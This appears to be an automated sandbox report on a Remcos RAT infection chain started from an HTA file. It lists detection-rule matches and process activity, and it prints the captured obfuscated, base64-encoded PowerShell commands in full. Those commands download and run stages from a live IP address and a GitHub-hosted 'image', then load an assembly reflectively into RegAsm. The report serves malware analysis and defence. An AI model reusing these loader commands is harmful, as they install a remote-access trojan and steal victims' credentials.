                      Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 3840, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/23@4/4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0041798D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,12_2_00418758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040F4AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041B539
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpricewithgoodcookiesme[1].tiffJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meuczva5.5dy.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.2242019579.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: RegAsm.exe, 0000000C.00000002.2253606777.0000000002ACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: na.htaVirustotal: Detection: 26%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                      Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\na.hta"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdkjbynsalyk"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS" Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = 